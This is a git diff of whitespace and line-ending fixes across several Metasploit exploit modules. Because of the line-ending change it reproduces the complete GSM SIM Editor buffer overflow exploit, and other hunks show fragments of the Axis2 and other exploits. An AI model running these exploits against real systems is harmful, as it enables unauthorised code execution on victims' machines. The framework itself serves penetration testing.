diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb
index 3cf35f8da3..6f7cb3df03 100644
--- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb
+++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
return [nil, nil] if not (res and res.headers['Set-Cookie'])
-
+
# Get the session ID from the cookie
m = res.headers['Set-Cookie'].match(/(DOLSESSID_.+);/)
id = (m.nil?) ? nil : m[1]
diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb
index 9c751d5e66..889642fce5 100644
--- a/modules/exploits/multi/http/axis2_deployer.rb
+++ b/modules/exploits/multi/http/axis2_deployer.rb
@@ -8,13 +8,13 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
+ Rank = ExcellentRanking
- HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] }
+ HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] }
- include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::HttpClient
- def initialize(info = {})
+ def initialize(info = {})
super(update_info(info,
'Name' => 'Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)',
'Description' => %q{
@@ -23,18 +23,18 @@ class Metasploit3 < Msf::Exploit::Remote
},
'References' =>
[
- # General
- [ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
- [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
- [ 'CVE', '2010-0219' ],
+ # General
+ [ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
+ [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
+ [ 'CVE', '2010-0219' ],
],
'Platform' => [ 'java', 'win', 'linux' ], # others?
'Targets' =>
[
[ 'Java', {
'Arch' => ARCH_JAVA,
- 'Platform' => 'java'
- },
+ 'Platform' => 'java'
+ },
],
#
# Platform specific targets only
@@ -82,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote
+ mep="http://www.w3.org/2004/08/wsdl/in-only"
+ class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
+ mep="http://www.w3.org/2004/08/wsdl/in-out"
+ class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
- metasploit.PayloadServlet
+ metasploit.PayloadServlet
}
@@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
zip.add_file("metasploit/PayloadServlet.class", servlet)
contents = zip.pack
- end
+ end
boundary = rand_text_alphanumeric(6)
@@ -134,27 +134,27 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
=begin
- res = send_request_raw({
- 'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp",
- 'method' => 'GET',
- 'headers' =>
- {
- 'Cookie' => "JSESSIONID=#{session}",
- }
- }, 25)
- puts res.body
- puts res.code
- if res.code > 200 and res.code < 300
- if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) )
- dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\"
- puts dir
- else
- if ( a.scan(/catalina\.home<\/th>
(.*) <\/td>/i) )
- dir = $1 + "/webapps/dswsbobje/WEB-INF/services/"
- puts dir
- end
- end
- end
+ res = send_request_raw({
+ 'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp",
+ 'method' => 'GET',
+ 'headers' =>
+ {
+ 'Cookie' => "JSESSIONID=#{session}",
+ }
+ }, 25)
+ puts res.body
+ puts res.code
+ if res.code > 200 and res.code < 300
+ if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) )
+ dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\"
+ puts dir
+ else
+ if ( a.scan(/catalina\.home<\/th> | (.*) <\/td>/i) )
+ dir = $1 + "/webapps/dswsbobje/WEB-INF/services/"
+ puts dir
+ end
+ end
+ end
=end
print_status("Polling to see if the service is ready")
@@ -241,7 +241,7 @@ class Metasploit3 < Msf::Exploit::Remote
rescue ::Rex::ConnectionError
print_error("http://#{rhost}:#{rport}#{rpath}/(rest|services) Unable to authenticate (#{res.code} #{res.message})")
end
- end
+ end
def cleanup_instructions(rpath, name)
print_line("")
@@ -256,7 +256,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_line("")
end
- def exploit
+ def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
rpath = datastore['PATH']
@@ -345,4 +345,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb
index 85ca51e297..b36472cddb 100644
--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
# RMI protocol specification
[ 'URL', 'http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html'],
# Placeholder reference for matching
- [ 'MSF', 'java_rmi_server']
+ [ 'MSF', 'java_rmi_server']
],
'DisclosureDate' => 'Oct 15 2011',
'Platform' => ['java', 'win', 'osx', 'linux', 'solaris'],
@@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0
))
register_options( [ Opt::RPORT(1099) ], self.class)
-
+
register_autofilter_ports([ 1098, 1099 ])
register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry })
end
@@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Not exploitable: the RMI class loader is disabled")
return
end
-
+
print_good("Target #{rhost}:#{rport} may be exploitable...")
# Wait for the request to be handled
diff --git a/modules/exploits/windows/browser/ms10_002_ie_object.rb b/modules/exploits/windows/browser/ms10_002_ie_object.rb
index d51b39a25f..b319706025 100644
--- a/modules/exploits/windows/browser/ms10_002_ie_object.rb
+++ b/modules/exploits/windows/browser/ms10_002_ie_object.rb
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => "MS10-002 Internet Explorer Object Memory Use-After-Free",
'Description' => %q{
This module exploits a vulnerability found in Internet Explorer's
- mshtml component. Due to the way IE handles objects in memory, it is
+ mshtml component. Due to the way IE handles objects in memory, it is
possible to cause a pointer in CTableRowCellsCollectionCacheItem::GetNext
to be used even after it gets freed, therefore allowing remote code
execution under the context of the user.
diff --git a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb
index 1b690baa74..e20f435c92 100644
--- a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb
+++ b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb
@@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def get_payload(hunter)
-
+
[ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
enc = framework.encoders.create(name)
if name =~ /unicode/
diff --git a/modules/exploits/windows/fileformat/gsm_sim.rb b/modules/exploits/windows/fileformat/gsm_sim.rb
index a70f4c4ca6..d376bc8213 100644
--- a/modules/exploits/windows/fileformat/gsm_sim.rb
+++ b/modules/exploits/windows/fileformat/gsm_sim.rb
@@ -1,75 +1,75 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
- Rank = NormalRanking
-
- include Msf::Exploit::FILEFORMAT
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'GSM SIM Editor 5.15 Buffer Overflow',
- 'Description' => %q{
- This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15.
- When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer
- overflow occurs which allows an attacker to execute arbitrary code.
- },
- 'License' => MSF_LICENSE,
- 'Author' =>
- [
- 'Ruben Alejandro',
- 'chap0 ',
- 'Lincoln '
- ],
- 'References' =>
- [
- [ 'EDB', '14258' ]
- ],
- 'DefaultOptions' =>
- {
- 'EXITFUNC' => 'process',
- },
- 'Platform' => 'win',
- 'Payload' =>
- {
- 'Space' => 2000,
- 'BadChars' => "\x00",
- 'DisableNops' => true,
- 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment #add esp, -3500
- },
- 'Targets' =>
- [
- [ 'Windows XP SP3',
- {
- 'Ret' => 0x00405201, # call esp - SIMEditor.exe
- 'Offset' => 810
- }
- ]
- ],
- 'Privileged' => false,
- 'DisclosureDate' => 'Jul 07 2010',
- 'DefaultTarget' => 0))
-
- register_options(
- [
- OptString.new('FILENAME', [ true, 'The file name.', 'msf.sms']),
- ], self.class)
-
- end
-
- def exploit
- buffer = rand_text_numeric(target['Offset'])
- buffer << [target.ret].pack('V').unpack("H*")[0]
- buffer << make_nops(30).unpack("H*")[0]
- buffer << payload.encoded.unpack("H*")[0]
-
- file_create(buffer)
- end
-
-end
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'GSM SIM Editor 5.15 Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15.
+ When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer
+ overflow occurs which allows an attacker to execute arbitrary code.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Ruben Alejandro',
+ 'chap0 ',
+ 'Lincoln '
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '14258' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'Space' => 2000,
+ 'BadChars' => "\x00",
+ 'DisableNops' => true,
+ 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment #add esp, -3500
+ },
+ 'Targets' =>
+ [
+ [ 'Windows XP SP3',
+ {
+ 'Ret' => 0x00405201, # call esp - SIMEditor.exe
+ 'Offset' => 810
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Jul 07 2010',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ true, 'The file name.', 'msf.sms']),
+ ], self.class)
+
+ end
+
+ def exploit
+ buffer = rand_text_numeric(target['Offset'])
+ buffer << [target.ret].pack('V').unpack("H*")[0]
+ buffer << make_nops(30).unpack("H*")[0]
+ buffer << payload.encoded.unpack("H*")[0]
+
+ file_create(buffer)
+ end
+
+end
diff --git a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb
index 599e325abc..dc69d352eb 100644
--- a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb
+++ b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'BID', '52718' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-052/' ],
[ 'URL', 'http://aluigi.altervista.org/adv/lmgrd_1-adv.txt' ],
- [ 'URL', 'http://www.flexerasoftware.com/pl/13057.htm' ] # Vendor advisory
+ [ 'URL', 'http://www.flexerasoftware.com/pl/13057.htm' ] # Vendor advisory
],
'Privileged' => true,
'DefaultOptions' =>